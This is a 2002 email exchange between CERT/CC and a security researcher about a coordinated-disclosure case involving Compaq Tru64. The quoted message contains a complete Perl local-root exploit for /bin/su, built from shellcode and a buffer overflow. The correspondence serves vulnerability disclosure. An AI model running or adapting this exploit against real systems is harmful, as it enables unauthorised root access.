From: "CERT(R) Coordination Center" <cert@cert.org>
To: "KF" <dotslash@snosoft.com>
Cc: "CERT(R) Coordination Center" <cert@cert.org>; <simon@snosoft.com>
Sent: Friday, July 19, 2002 7:36 AM
Subject: Re: VU#193347



 -----BEGIN PGP SIGNED MESSAGE-----
 
 Hi, Kevin.
 
 Can I pass your words to Compaq?
 
 And, BTW, the latest from Compaq, as of a few minutes ago:
 
 "We have assigned case id SSRT2275 to cover the whole of these
 reports.  We are working all of them and will update you for releasing
 "early release patches" once we have solutions.  As you might well
 understand this is not a simple 1 or 2 component issue solutions to
 manage fixes for everything identified is a bit complex."
 
 Thanks,
 Ian
 
 Ian A. Finlay
 CERT (R) Coordination Center 
 Software Engineering Institute
 Carnegie Mellon University
 Pittsburgh, PA  USA  15213-3890
 
 
 Kf <dotslash@snosoft.com> writes:

 >Just so Compaq does not flip out and try to sue us... it has come to my 
 >attention that someone with access to our lab has leaked one of the 
 >exploits for TRU64. We employ people from the general public from all 
 >over the world for our development so we have not yet pinpointed how the 
 >code was "lifted" as many people have access to our lab. This issue was 
 >already passed on to the public in September of 2001 and an exploit was 
 >ALREADY published by k2 of ADM...so I don't see this as any big surprise 
 >short of the fact that ours will bypass the non-exec stack...just a 
 >heads up. http://packetstorm.linuxsecurity.com/0101-exploits/tru-64.su.c > >is the code that was released last year...
 >This is the code that we created to exploit /bin/su... I believe this is 
 >what was leaked.
 >
 >
 >#!/usr/bin/perl -w
 >#
 ># xxxxx (xxxxx@snosoft.com) - 30/05/2002
 >#
 >
 >($offset) = @ARGV,$offset || ($offset = 0);
 >$ret_addr = pack("ll",(0x40010250+$offset),0x1);
 >
 >$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
 >$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
 >$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
 >$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
 >$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
 >$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
 >$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
 >$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
 >$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
 >$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";
 >
 >$buf_a  = "A"x8233;
 >$buf_a .= $ret_addr;
 >
 >$buf_b  = pack("l",0x47ff041f)x3750;
 >$buf_b .= $sc;
 >
 >exec("/usr/bin/su",$buf_a,$buf_b,0);
 >
 >-KF

 - -- 
 Ian Finlay
 Internet Systems Security Analyst - CERT/CC Operations 
 Networked Systems Survivability Program
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 CERT (R) Coordination Center             Email: cert@cert.org
 Software Engineering Institute           WWW: http://www.cert.org
 Carnegie Mellon University               Hotline: +1-412-268-7090
 Pittsburgh, PA  USA  15213-3890          FAX: +1-412-268-6989
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
 
 
 
 -----BEGIN PGP SIGNATURE-----
 Version: PGPfreeware 5.0i for non-commercial use
 Charset: noconv
 
 iQCVAwUBPTgkc6CVPMXQI2HJAQECWgQAt10vpL8bpz3i8HJOhZccjqzecrm+c1v0
 ESwlboa+M1MT72qUJrJN2oQ30b0UrzJ7VKEY82Yi2rUpY6BkrYXuUZz9fTOyPefY
 +Og4n4EjTxRHl+xXXlWGjH7F+tcX+lhocPmK+Qti1m6Vb4K9nXZ93OxTN+j6h4Jt
 83vX3DG5ErI=
 =IWbS
 -----END PGP SIGNATURE-----
 



